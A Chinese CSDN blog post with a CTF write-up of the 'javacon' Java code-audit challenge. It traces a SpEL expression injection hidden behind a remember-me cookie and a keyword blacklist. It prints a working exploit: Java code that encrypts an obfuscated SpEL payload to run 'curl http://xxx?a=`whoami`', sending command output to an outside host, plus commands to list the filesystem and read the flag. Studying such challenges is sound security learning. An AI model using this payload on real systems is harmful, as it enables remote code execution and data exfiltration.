[Java代码审计]javacon WriteUp

最新推荐文章于 2023-03-17 16:09:40 发布
最新推荐文章于 2023-03-17 16:09:40 发布
阅读量861 收藏 3
点赞数 3
分类专栏: # Java代码审计 安全学习 # 训练打卡日记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/solitudi/article/details/118964923
版权

文章目录

写在前面

在P神星球看到的,这里学习一下,文件在https://www.leavesongs.com/media/attachment/2018/11/23/challenge-0.0.1-SNAPSHOT.jar

javacon

运行的时候利用java -jar challenge-0.0.1-SNAPSHOT.jar
首先查看配置
在这里插入图片描述
首先在登录页面,在login页面post接收参数,与配置当中的比对,成功则设置cookie

@PostMapping({"/login"})
    public String login(@RequestParam(value = "username",required = true) String username, @RequestParam(value = "password",required = true) String password, @RequestParam(value = "remember-me",required = false) String isRemember, HttpSession session, HttpServletResponse response) {
        if (this.userConfig.getUsername().contentEquals(username) && this.userConfig.getPassword().contentEquals(password)) {
            session.setAttribute("username", username);
            if (isRemember != null && !isRemember.equals("")) {
                Cookie c = new Cookie("remember-me", this.userConfig.encryptRememberMe());
                c.setMaxAge(2592000);
                response.addCookie(c);
            }

            return "redirect:/";
        } else {
            return "redirect:/login-error";
        }
    }

选中RememberMe之后登录,成功进入
在这里插入图片描述
我们看看这里进行的操作,首先获取remember-me参数
在这里插入图片描述
查看函数getAdvanceValue
在这里插入图片描述
首先这里将接收的参数并与黑名单进行比对,如果匹配成功则抛出错误
在这里插入图片描述
如果没有匹配到则进行正常流程,在SmallEvaluationContext进行SpEL表达式解析。注意,这里就存在SPEl表达式注入
在这里插入图片描述
因此我们只需要绕过黑名单构造参数即可

class Encryptor {
    static Logger logger = LoggerFactory.getLogger(Encryptor.class);

    public Encryptor() {
    }

    public static String encrypt(String key, String initVector, String value) {
        try {
            IvParameterSpec iv = new IvParameterSpec(initVector.getBytes("UTF-8"));
            SecretKeySpec skeySpec = new SecretKeySpec(key.getBytes("UTF-8"), "AES");
            Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5PADDING");
            cipher.init(1, skeySpec, iv);
            byte[] encrypted = cipher.doFinal(value.getBytes());
            return Base64.getUrlEncoder().encodeToString(encrypted);
        } catch (Exception var7) {
            logger.warn(var7.getMessage());
            return null;
        }
    }

    public static String decrypt(String key, String initVector, String encrypted) {
        try {
            IvParameterSpec iv = new IvParameterSpec(initVector.getBytes("UTF-8"));
            SecretKeySpec skeySpec = new SecretKeySpec(key.getBytes("UTF-8"), "AES");
            Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5PADDING");
            cipher.init(2, skeySpec, iv);
            byte[] original = cipher.doFinal(Base64.getUrlDecoder().decode(encrypted));
            return new String(original);
        } catch (Exception var7) {
            logger.warn(var7.getMessage());
            return null;
        }
    }
}

public class RMIServer {
    public static void main(String[] args) throws IOException, ClassNotFoundException, NoSuchMethodException, InvocationTargetException, IllegalAccessException, InstantiationException {
        System.out.println(Encryptor.encrypt("c0dehack1nghere1", "0123456789abcdef", "#{T(String).getClass().forName(\"java.l\"+\"ang.Ru\"+\"ntime\").getMethod(\"ex\"+\"ec\",T(String[])).invoke(T(String).getClass().forName(\"java.l\"+\"ang.Ru\"+\"ntime\").getMethod(\"getRu\"+\"ntime\").invoke(T(String).getClass().forName(\"java.l\"+\"ang.Ru\"+\"ntime\")),new String[]{\"/bin/bash\",\"-c\",\"curl http://xxx?a=`whoami`\"})}"));
    }
}

成功拿到
在这里插入图片描述
看看根目录使用ls /|base64防止遇到空格以后被截断
在这里插入图片描述
通过cat /flag获取到flag

在这里插入图片描述

Y4tacker
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
JAVA代码审计
gjgj的博客
07-13 1万+
小迪 2020-6 第55天 如果去分析代码:工具 加 手工 相结合的方法进行分析 Java代码审计,主要从代码层面分析: 主要分为三大类:1、常规性代码 2、框架性代码 ( 各种各样的开发框架) (最常见的 框架漏洞是 struts2 框架漏洞 ) ...
Java代码审计
06-15
该课程从代码审计与渗透测试优缺点对比讲起,讲解了为什么前端防护都是纸老虎、如何从后端防护来防止漏洞被利用。学好该课程对于渗透的朋友能更彻底的了解漏洞的原理、开发的朋友能写出没有漏洞的代码。课程当中会使用到Fortify这个工具,下载地址:链接:https://pan.baidu.com/s/1zgbKGPMah4ujQ3ML0f6E-Q 提取码:3gme
ctf_writeup:来自 Balsn 的 CTF 文章
08-03
Balsn CTF 报道 Balsn 是来自台湾的 CTF 团队,成立于 2016 年。我们积极参与 CTF 比赛,并发表有关挑战的文章。 在我们的 GitHub 存储库中,这些文章采用 markdown + kaTeX 格式。 有关更多信息,请参阅。 目录 20200208-codegatectf2020quals 20191228-hxp36c3ctf 20191019-secconquals 20191012-hitconctfquals 20190928-pwnthybytesctf 20190928-bsidesdelhictf 20190921-dragonctfteaser 20190913-realworldctfqual 20190907-defcampctfqual 20190906-trendmicroctfqual 20190906-n1ct
【已解决】this version of the Java Runtime only recognizes class file versions up to 52.0
热门推荐
Welcome
03-17 2万+
this version of the Java Runtime only recognizes class file versions up to 52.0
The stack size specified is too small, Specify at least 228k
进击的小白
09-18 3573
场景 java启动程序是报错 The stack size specified is too small, Specify at least 228k Error: Could not create the Java Virtual Machine. Error: A fatal exception has occurred. Program will exit. 原因 直面意思指定的堆栈大小太小,请至少指定228k。 我的启动命令是,因为设置了-Xss为128k(线程堆栈大小,jdk8默认为1
code-breaking之javacon
snowlyzz的博客
02-21 531
CTF中SpEL注入题型
Java -- 代码审计
tryheart的博客
09-19 582
JAVA代码审计 文件下载 检查文件处理时,是否有对路径进行强限定,因为强限定路径可以避免用户恶意构建下载文件的路径 文件上传 了解文件路径 src—源代码目录(在部署的时候不会放入到容器里) WebContent(WebApp\Web)—Web 应用,服务器部署目录,在服务器中生成当前文件同名的目录部署,表示工程根路径。如WEBDemo工程的部署,会将 WebContent改名为WEBDemo。如需要访问改目录则直接使用http://localhost:8080/WEBDemo ​ WEB-INF
java代码审计_Java代码审计入门篇
weixin_39923945的博客
02-12 720
本期斗哥带来Java代码审计的一些环境和工具准备。Java这个语言相对于PHP来说还是比较复杂的,所以一开始接触到Java源码审计的时候会遇到一些关于环境和配置上一些困难,本文记录斗哥在开始去审计Java代码的一些准备,希望能够帮助到刚入门的新手朋友们。0×00 Java环境说明1. 安装Java环境安装完成后默认的安装目录:环境变量的配置,环境变量配置主要是告诉我们自己的电脑Java安装完后几个...
java代码审计
qq_44256371的博客
12-06 1416
java代码审计
Java敏捷开发(王伟杰译)
07-19
用于Java的开发,很实用的,希望可以帮助你们,给好评
2023 强网杯 Writeup
最新发布
01-29
2023 强网杯 Writeup
[SECT2019] —writeup撰写.docx
11-28
writeup CTF
GKCTF2021-官方WriteUp.pdf
07-06
GKCTF2021-官方WriteUp.pdf
jar中没有主清单属性
weixin_43605386的博客
07-22 1048
通过maven-install把springboot的maven项目打包成jar包后,用命令行运行jar文件 F:\>java -jar springboot-test-0.0.1-SNAPSHOT.jar springboot-test-0.0.1-SNAPSHOT.jar中没有主清单属性 被提示没有主清单属性 1.解决方法 调用maven的插件,完成main方法的指定,springboot有专门为maven提供了打包springboot的所有插件简化资源。在pom.xml中添加spring.
Kubernetes官方java客户端之五:proto基本操作
程序员欣宸的博客
07-24 1885
实战K8S官方java客户端的protobuf基本操作
iscc2015官方writeup
09-06
iscc2015是国际信号与通信会议(International Symposium on Communication and Information Technologies)的官方writeup,在这个writeup中,主要回顾了iscc2015会议的主要内容和成果。 iscc2015会议是由IEEE(Institute of Electrical and Electronics Engineers)主办的,旨在聚集来自全球的学者、研究人员和专业人士,共同探讨和交流关于通信和信息技术领域的最新研究和发展。 这个writeup首先介绍了iscc2015会议的背景和目标,提及了该会议为促进学术界和工业界之间的合作、创新和知识交流所做的努力。接着,该writeup详细描述了iscc2015会议的主要议题,包括通信网络、无线通信、数据通信和网络安全等方面。此外,还列举了一些重要的研究课题和领域,如物联网、云计算、移动通信和多媒体通信等。 iscc2015的writeup还总结了会议期间的重要活动和成果。这些活动包括学术论文的研讨会和展示、专题演讲、研讨会和研究项目的发布等。会议期间,各个领域的专家和学者积极参与并互相交流了关于通信和信息技术领域的最新研究成果和创新理念。 最后,iscc2015的官方writeup总结了会议的收获和影响。该会议为全球通信和信息技术领域的研究人员和专业人士提供了一个交流和合作的平台,推动了相关领域的发展和创新。此外,与会者还从中获得了有关新技术、新方法和最佳实践的信息和经验。 总之,iscc2015官方writeup回顾了这个国际会议的主要内容和成果,强调了其在通信和信息技术领域的重要性和影响。通过促进学术界和工业界之间的交流与合作,这个会议为促进全球通信和信息技术领域的发展做出了贡献。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值